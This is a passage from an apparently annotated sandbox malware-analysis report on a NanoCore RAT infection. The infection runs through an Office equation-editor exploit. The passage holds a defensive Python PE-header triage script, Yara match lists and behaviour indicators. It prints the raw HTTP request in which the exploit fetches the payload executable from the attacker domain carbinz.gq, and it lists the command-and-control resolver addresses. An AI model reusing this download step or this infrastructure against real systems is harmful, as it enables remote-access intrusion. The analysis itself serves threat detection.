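    "0400000000000000040000000000000000a00b00000200000000000002004085"  # 0x0c0
    "0000100000100000000010000010000000000000100000000000000000000000"  # 0x0e0 16 data directories follow
    "70510b004f00000000600b00dc05000000000000000000000000000000000000"  # 0x100
    "00800b000c00000038500b001c00000000000000000000000000000000000000"  # 0x120
    "0000000000000000000000000000000000000000000000000020000008000000"  # 0x140
    "0000000000000000082000004800000000000000000000002e74657874000000"  # 0x160 directory 14 = CLR header
    "c8310b000020000000320b000002000000000000000000000000000020000060"  # 0x180 .text
    "2e72737263000000dc05000000600b000006000000340b000000000000000000"  # 0x1a0 .rsrc
    "00000000400000402e72656c6f6300000c00000000800b0000020000003a0b00"  # 0x1c0 .reloc
    "0000000000000000000000004000004200000000000000000000000000000000"  # 0x1e0
    "a4510b00000000004800000002000500a8ab010008cd0000030000006b000006"  # 0x200 IAT, then CLR header
    "b078020088d70800000000000000000000000000000000000000000000000000"  # 0x220
    "0000000000000000000000000000000000000000000000000000000000000000"  # 0x240
)
# Response headers as shown in the report.
SAMPLE_HEADERS = {"Content-Type": "application/x-msdownload", "Content-Length": "736256"}

MACHINES = {0x14C: "x86", 0x8664: "x64", 0x1C0: "ARM", 0xAA64: "ARM64"}


def rva_to_offset(rva, sections):
    """Map a relative virtual address to a file offset through the section table."""
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return rva - s["va"] + s["rawptr"]
    raise ValueError(f"RVA {rva:#x} is not inside any section")


def parse_pe_header(data):
    """Parse DOS/COFF/optional headers, the section table and, if present, the CLR header."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    machine, nsect, ts, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    magic, lnk_major, lnk_minor = struct.unpack_from("<HBB", data, opt)
    if magic != 0x10B:
        raise ValueError("only PE32 is handled here")  # PE32+ shifts the later fields
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    nrva = struct.unpack_from("<I", data, opt + 92)[0]
    dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(nrva)]
    sections = []
    for i in range(nsect):
        name, vsize, va, rawsize, rawptr, _, _, _, _, flags = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode(), "vsize": vsize, "va": va,
                         "rawsize": rawsize, "rawptr": rawptr, "flags": flags})
    info = {
        "machine": MACHINES.get(machine, hex(machine)),
        "timestamp": ts,
        "link_time": datetime.fromtimestamp(ts, tz=timezone.utc).isoformat(),
        "linker_version": (lnk_major, lnk_minor),
        "entry_point": entry,
        "sections": [s["name"] for s in sections],
        "end_of_last_section": max(s["rawptr"] + s["rawsize"] for s in sections),
        "is_dotnet": False,
    }
    clr_rva, _ = dirs[14] if nrva > 14 else (0, 0)
    if clr_rva:
        # IMAGE_COR20_HEADER: cb, runtime major/minor, metadata RVA/size, flags,
        # entry point token, managed resources RVA/size.
        _, rt_major, rt_minor, _, _, flags, ep_token, _, res_size = struct.unpack_from(
            "<IHHIIIIII", data, rva_to_offset(clr_rva, sections))
        info["is_dotnet"] = True
        info["clr"] = {"runtime": f"{rt_major}.{rt_minor}", "flags": flags,
                       "il_only": bool(flags & 1), "entry_point_token": ep_token,
                       "resources_size": res_size}
    return info


def triage_download(headers, body):
    """One call that gives a responder the facts about an x-msdownload body."""
    info = parse_pe_header(body)
    length = int(headers.get("Content-Length", len(body)))
    info["content_type_is_exe"] = headers.get("Content-Type") == "application/x-msdownload"
    # Bytes after the last section are an overlay (config, payload, signature); 0 means none.
    info["overlay_bytes"] = length - info["end_of_last_section"]
    return info


if __name__ == "__main__":
    for key, value in triage_download(SAMPLE_HEADERS, SAMPLE_BODY).items():
        print(f"{key}: {value}")
```

Two of the results are worth reading against the rest of the report: the link timestamp (2021-06-08 13:03:55 UTC) is about three hours before the server's Last-Modified, so the file was built and uploaded the same day; and the managed-resources directory is roughly 580 KB of a 736 KB file, which fits the ".NET source code contains very large strings" and "contains potential unpacker" signatures above, since a small loader with a large embedded blob is the usual shape of a .NET packer.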
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.239.243.112
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDIE-AS-APCloudieLimitedHK
Source: Joe Sandbox View ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
  GET /modex/catx.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: carbinz.gq
  Connection: Keep-Alive
  (This is the default WinINet/urlmon user agent of a Windows 7 host, not a browser session; together with the copy of the download landing in Temporary Internet Files\Content.IE5 and the "EQNEDT32.EXE connecting to internet" Sigma hit, it points to the exploit shellcode fetching the payload through the URL download APIs.)
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174 (43 packets)
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.177 (2 packets)
  (37.235.1.174 and 37.235.1.177 are the FreeDNS public resolvers, and 37.235.1.177 is the BackupDNSServer in the extracted configuration with UseCustomDNS enabled: the implant sends its C2 name lookups straight to these servers, so their addresses come from the configuration rather than from a DNS answer, and host-based DNS logging that watches only the Windows resolver will not see the queries.)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B4C37CD3-97C0-4A14-814E-1968BCE52029}.tmp
Source: unknown DNS traffic detected: queries for: carbinz.gq
Source: cat464923.exe, 00000005.00000002.2352132844.0000000005800000.00000002.00000001.sdmp, taskeng.exe, 0000000A.00000002.2347261747.0000000001CB0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: cat464923.exe, 00000005.00000002.2352132844.0000000005800000.00000002.00000001.sdmp, taskeng.exe, 0000000A.00000002.2347261747.0000000001CB0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a raw input device (often for capturing keystrokes)
Source: cat464923.exe, 00000005.00000002.2347482313.00000000004A0000.00000004.00000001.sdmp Binary or memory string: RegisterRawInputDevices

E-Banking Fraud:

Yara detected Nanocore RAT
Source: the same Yara matches listed under AV Detection above (memory dumps, the process memory of smtpsvc.exe and cat464923.exe, and the unpacked PE regions)
Source: Yara match File source: 18.2.smtpsvc.exe.33a019c.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.cat464923.exe.3304d80.6.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000010.00000000.2148512830.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000010.00000000.2148512830.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.2347454023.0000000000440000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000012.00000002.2220223642.0000000003359000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000012.00000002.2218871109.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000012.00000002.2218871109.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000000.2088911305.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000000.2088911305.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000011.00000002.2221684497.0000000003309000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.2347482313.00000000004A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.2091457817.0000000003585000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.2091457817.0000000003585000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000011.00000000.2184659312.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000011.00000000.2184659312.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000011.00000002.2220476189.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000011.00000002.2220476189.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.2351063180.00000000034D9000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.2212946414.0000000003525000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.2212946414.0000000003525000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000002.2217963570.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000010.00000002.2217963570.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000B.00000002.2213146011.00000000033E5000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000B.00000002.2213146011.00000000033E5000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000000.2147864826.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000010.00000000.2147864826.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000011.00000000.2148426464.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000011.00000000.2148426464.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.2212398437.0000000003379000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.2212398437.0000000003379000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000002.2220405288.0000000002281000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000002.2090874176.00000000033D9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.2090874176.00000000033D9000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000002.2220469007.0000000003289000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000011.00000002.2221628087.0000000002301000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000012.00000002.2220153845.0000000002351000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000000.2088546622.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000000.2088546622.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000012.00000000.2168272542.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000012.00000000.2168272542.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000002.2209068863.00000000030A9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000002.2209068863.00000000030A9000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000012.00000000.2169977777.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000012.00000000.2169977777.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.2347409859.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.2347409859.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000B.00000002.2212832493.0000000003239000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000B.00000002.2212832493.0000000003239000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000002.2210122241.0000000003255000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000002.2210122241.0000000003255000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: smtpsvc.exe PID: 2416, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: smtpsvc.exe PID: 2416, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: cat464923.exe PID: 2468, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: cat464923.exe PID: 2468, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: cat464923.exe PID: 2324, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: cat464923.exe PID: 2324, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: cat464923.exe PID: 2668, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: cat464923.exe PID: 2668, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 17.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 17.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.2.smtpsvc.exe.2324e04.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.cat464923.exe.34e019c.10.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.cat464923.exe.4a0000.5.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.smtpsvc.exe.339b366.6.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.smtpsvc.exe.339b366.6.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.smtpsvc.exe.3444d80.6.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.smtpsvc.exe.3444d80.6.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.cat464923.exe.34db366.8.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.cat464923.exe.34db366.8.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.2.cat464923.exe.32d019c.5.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.2.cat464923.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.2.cat464923.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.cat464923.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.cat464923.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.2.smtpsvc.exe.334b366.5.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 17.2.smtpsvc.exe.334b366.5.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.2.smtpsvc.exe.33a019c.5.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.cat464923.exe.440000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.2.smtpsvc.exe.33547c5.4.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.cat464923.exe.34e47c5.9.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.2.smtpsvc.exe.3174d80.5.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.smtpsvc.exe.3174d80.5.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 17.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.2.cat464923.exe.22a4dc8.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.smtpsvc.exe.3444d80.6.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.smtpsvc.exe.3444d80.6.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.2.smtpsvc.exe.335019c.6.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.2.cat464923.exe.32d019c.5.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.cat464923.exe.24aeb3c.7.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.cat464923.exe.34a4d80.7.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.cat464923.exe.34a4d80.7.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.cat464923.exe.4a4629.4.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 17.2.smtpsvc.exe.335019c.6.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.cat464923.exe.4a0000.5.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 11.2.cat464923.exe.3304d80.6.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 11.2.cat464923.exe.3304d80.6.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.cat464923.exe.34e019c.10.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.2.cat464923.exe.32cb366.6.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.2.cat464923.exe.32cb366.6.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.2.cat464923.exe.32d47c5.4.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.cat464923.exe.34a4d80.7.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.cat464923.exe.34a4d80.7.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.2.smtpsvc.exe.3174d80.5.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.smtpsvc.exe.3174d80.5.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.2.smtpsvc.exe.33a47c5.4.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.smtpsvc.exe.33a019c.5.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.smtpsvc.exe.2374e04.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 11.2.cat464923.exe.3304d80.6.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 11.2.cat464923.exe.3304d80.6.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
.NET source code contains very large strings
Source: catx[1].exe.2.dr, Form1.cs Long String: Length: 11840
Source: 4.2.cat464923.exe.8d0000.0.unpack, Form1.cs Long String: Length: 11840
Source: 4.0.cat464923.exe.8d0000.0.unpack, Form1.cs Long String: Length: 11840
Source: smtpsvc.exe.5.dr, Form1.cs Long String: Length: 11840
Source: 5.0.cat464923.exe.8d0000.2.unpack, Form1.cs Long String: Length: 11840
Source: 5.0.cat464923.exe.8d0000.4.unpack, Form1.cs Long String: Length: 11840
Source: 5.0.cat464923.exe.8d0000.0.unpack, Form1.cs Long String: Length: 11840
Source: 5.2.cat464923.exe.8d0000.6.unpack, Form1.cs Long String: Length: 11840
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\catx[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\cat464923.exe
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\AppData\Roaming\cat464923.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\cat464923.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\cat464923.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\cat464923.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\cat464923.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\cat464923.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\cat464923.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\cat464923.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Memory allocated: 76D20000 page execute and read and write
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002EDC28 4_2_002EDC28
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E0098 4_2_002E0098
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E5920 4_2_002E5920
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002EBD38 4_2_002EBD38
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E4D08 4_2_002E4D08
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E1553 4_2_002E1553
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E3D8E 4_2_002E3D8E
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E71C0 4_2_002E71C0
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E3A61 4_2_002E3A61
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E2670 4_2_002E2670
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E36C8 4_2_002E36C8
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002EDF00 4_2_002EDF00
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E6300 4_2_002E6300
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002EC038 4_2_002EC038
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E9430 4_2_002E9430
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E8068 4_2_002E8068
